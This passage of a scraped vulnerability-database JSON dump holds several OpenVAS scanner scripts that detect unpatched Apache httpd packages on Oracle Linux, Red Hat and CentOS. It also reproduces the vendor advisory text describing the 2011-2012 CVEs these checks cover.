http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123992\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:11:20 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2012-0128\");\n script_tag(name:\"insight\", value:\"ELSA-2012-0128 - httpd security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2012-0128\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2012-0128.html\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = 
isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.15~15.0.1.el6_2.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.15~15.0.1.el6_2.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.15~15.0.1.el6_2.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.15~15.0.1.el6_2.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.15~15.0.1.el6_2.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-28T18:23:41", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2012-0323", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123980", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123980", "title": "Oracle Linux Local Check: ELSA-2012-0323", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2012-0323.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; 
without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123980\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:11:07 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2012-0323\");\n script_tag(name:\"insight\", value:\"ELSA-2012-0323 - httpd security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2012-0323\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2012-0323.html\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) 
exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~63.0.1.el5_8.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~63.0.1.el5_8.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~63.0.1.el5_8.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~63.0.1.el5_8.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-11-23T15:17:01", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2012-02-27T00:00:00", "id": "OPENVAS:1361412562310870571", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870571", "title": "RedHat Update for httpd RHSA-2012:0323-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for httpd RHSA-2012:0323-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2012-February/msg00063.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870571\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-27 11:17:07 +0530 (Mon, 27 Feb 2012)\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2012-0031\",\n \"CVE-2012-0053\", \"CVE-2011-3368\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"RHSA\", value:\"2012:0323-01\");\n script_name(\"RedHat Update for httpd RHSA-2012:0323-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n script_tag(name:\"affected\", value:\"httpd on Red Hat Enterprise Linux (v. 5 server)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"The Apache HTTP Server is a popular web server.\n\n It was discovered that the fix for CVE-2011-3368 (released via\n RHSA-2011:1392) did not completely address the problem. 
An attacker could\n bypass the fix and make a reverse proxy connect to an arbitrary server not\n directly accessible to the attacker by sending an HTTP version 0.9 request.\n (CVE-2011-3639)\n\n The httpd server included the full HTTP header line in the default error\n page generated when receiving an excessively long or malformed header.\n Malicious JavaScript running in the server's domain context could use this\n flaw to gain access to httpOnly cookies. (CVE-2012-0053)\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way httpd performed substitutions in regular expressions. An\n attacker able to set certain httpd settings, such as a user permitted to\n override the httpd configuration for a specific directory using a\n ".htaccess" file, could use this flaw to crash the httpd child process or,\n possibly, execute arbitrary code with the privileges of the "apache" user.\n (CVE-2011-3607)\n\n A flaw was found in the way httpd handled child process status information.\n A malicious program running with httpd child process privileges (such as a\n PHP or CGI script) could use this flaw to cause the parent httpd process to\n crash during httpd service shutdown. (CVE-2012-0031)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. 
After installing the updated\n packages, the httpd daemon will be restarted automatically.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-02T10:57:25", "bulletinFamily": "scanner", "description": "Check for the Version of httpd", "modified": "2018-01-01T00:00:00", "published": "2012-02-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=870571", "id": "OPENVAS:870571", "title": "RedHat Update for httpd RHSA-2012:0323-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for httpd RHSA-2012:0323-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free 
software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache HTTP Server is a popular web server.\n\n It was discovered that the fix for CVE-2011-3368 (released via\n RHSA-2011:1392) did not completely address the problem. An attacker could\n bypass the fix and make a reverse proxy connect to an arbitrary server not\n directly accessible to the attacker by sending an HTTP version 0.9 request.\n (CVE-2011-3639)\n\n The httpd server included the full HTTP header line in the default error\n page generated when receiving an excessively long or malformed header.\n Malicious JavaScript running in the server's domain context could use this\n flaw to gain access to httpOnly cookies. (CVE-2012-0053)\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way httpd performed substitutions in regular expressions. 
An\n attacker able to set certain httpd settings, such as a user permitted to\n override the httpd configuration for a specific directory using a\n ".htaccess" file, could use this flaw to crash the httpd child process or,\n possibly, execute arbitrary code with the privileges of the "apache" user.\n (CVE-2011-3607)\n\n A flaw was found in the way httpd handled child process status information.\n A malicious program running with httpd child process privileges (such as a\n PHP or CGI script) could use this flaw to cause the parent httpd process to\n crash during httpd service shutdown. (CVE-2012-0031)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon will be restarted automatically.\";\n\ntag_affected = \"httpd on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2012-February/msg00063.html\");\n script_id(870571);\n script_version(\"$Revision: 8265 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-01 07:29:23 +0100 (Mon, 01 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-27 11:17:07 +0530 (Mon, 27 Feb 2012)\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2012-0031\",\n \"CVE-2012-0053\", \"CVE-2011-3368\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"RHSA\", value: \"2012:0323-01\");\n script_name(\"RedHat Update for httpd RHSA-2012:0323-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n 
script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-02T10:57:25", "bulletinFamily": "scanner", "description": "Check for the Version of httpd", "modified": "2017-12-27T00:00:00", "published": "2012-07-30T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=881089", "id": "OPENVAS:881089", "title": "CentOS Update for httpd CESA-2012:0128 centos6 ", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability 
Test\n#\n# CentOS Update for httpd CESA-2012:0128 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache HTTP Server is a popular web server.\n\n It was discovered that the fix for CVE-2011-3368 (released via\n RHSA-2011:1391) did not completely address the problem. An attacker could\n bypass the fix and make a reverse proxy connect to an arbitrary server not\n directly accessible to the attacker by sending an HTTP version 0.9 request,\n or by using a specially-crafted URI. (CVE-2011-3639, CVE-2011-4317)\n \n The httpd server included the full HTTP header line in the default error\n page generated when receiving an excessively long or malformed header.\n Malicious JavaScript running in the server's domain context could use this\n flaw to gain access to httpOnly cookies. (CVE-2012-0053)\n \n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way httpd performed substitutions in regular expressions. 
An\n attacker able to set certain httpd settings, such as a user permitted to\n override the httpd configuration for a specific directory using a\n ".htaccess" file, could use this flaw to crash the httpd child process or,\n possibly, execute arbitrary code with the privileges of the "apache" user.\n (CVE-2011-3607)\n \n A flaw was found in the way httpd handled child process status information.\n A malicious program running with httpd child process privileges (such as a\n PHP or CGI script) could use this flaw to cause the parent httpd process to\n crash during httpd service shutdown. (CVE-2012-0031)\n \n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon will be restarted automatically.\";\n\ntag_affected = \"httpd on CentOS 6\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-February/018433.html\");\n script_id(881089);\n script_version(\"$Revision: 8249 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-27 07:29:56 +0100 (Wed, 27 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:05:13 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\",\n \"CVE-2012-0053\", \"CVE-2011-3368\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"CESA\", value: \"2012:0128\");\n script_name(\"CentOS Update for httpd CESA-2012:0128 centos6 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n 
script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-06T13:06:47", "bulletinFamily": "scanner", "description": "Check for the Version of httpd", "modified": "2018-01-05T00:00:00", "published": "2012-07-09T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=870631", "id": "OPENVAS:870631", "title": "RedHat Update for httpd RHSA-2012:0128-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS 
Vulnerability Test\n#\n# RedHat Update for httpd RHSA-2012:0128-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache HTTP Server is a popular web server.\n\n It was discovered that the fix for CVE-2011-3368 (released via\n RHSA-2011:1391) did not completely address the problem. An attacker could\n bypass the fix and make a reverse proxy connect to an arbitrary server not\n directly accessible to the attacker by sending an HTTP version 0.9 request,\n or by using a specially-crafted URI. (CVE-2011-3639, CVE-2011-4317)\n\n The httpd server included the full HTTP header line in the default error\n page generated when receiving an excessively long or malformed header.\n Malicious JavaScript running in the server's domain context could use this\n flaw to gain access to httpOnly cookies. (CVE-2012-0053)\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way httpd performed substitutions in regular expressions. 
An\n attacker able to set certain httpd settings, such as a user permitted to\n override the httpd configuration for a specific directory using a\n ".htaccess" file, could use this flaw to crash the httpd child process or,\n possibly, execute arbitrary code with the privileges of the "apache" user.\n (CVE-2011-3607)\n\n A flaw was found in the way httpd handled child process status information.\n A malicious program running with httpd child process privileges (such as a\n PHP or CGI script) could use this flaw to cause the parent httpd process to\n crash during httpd service shutdown. (CVE-2012-0031)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon will be restarted automatically.\";\n\ntag_affected = \"httpd on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2012-February/msg00029.html\");\n script_id(870631);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-09 10:37:07 +0530 (Mon, 09 Jul 2012)\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\", \"CVE-2011-3368\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"RHSA\", value: \"2012:0128-01\");\n script_name(\"RedHat Update for httpd RHSA-2012:0128-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone 
Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-02T00:02:06", "bulletinFamily": "scanner", "description": "The remote host is missing an update to apache2\nannounced via advisory DSA 2405-1.", "modified": "2018-04-06T00:00:00", "published": 
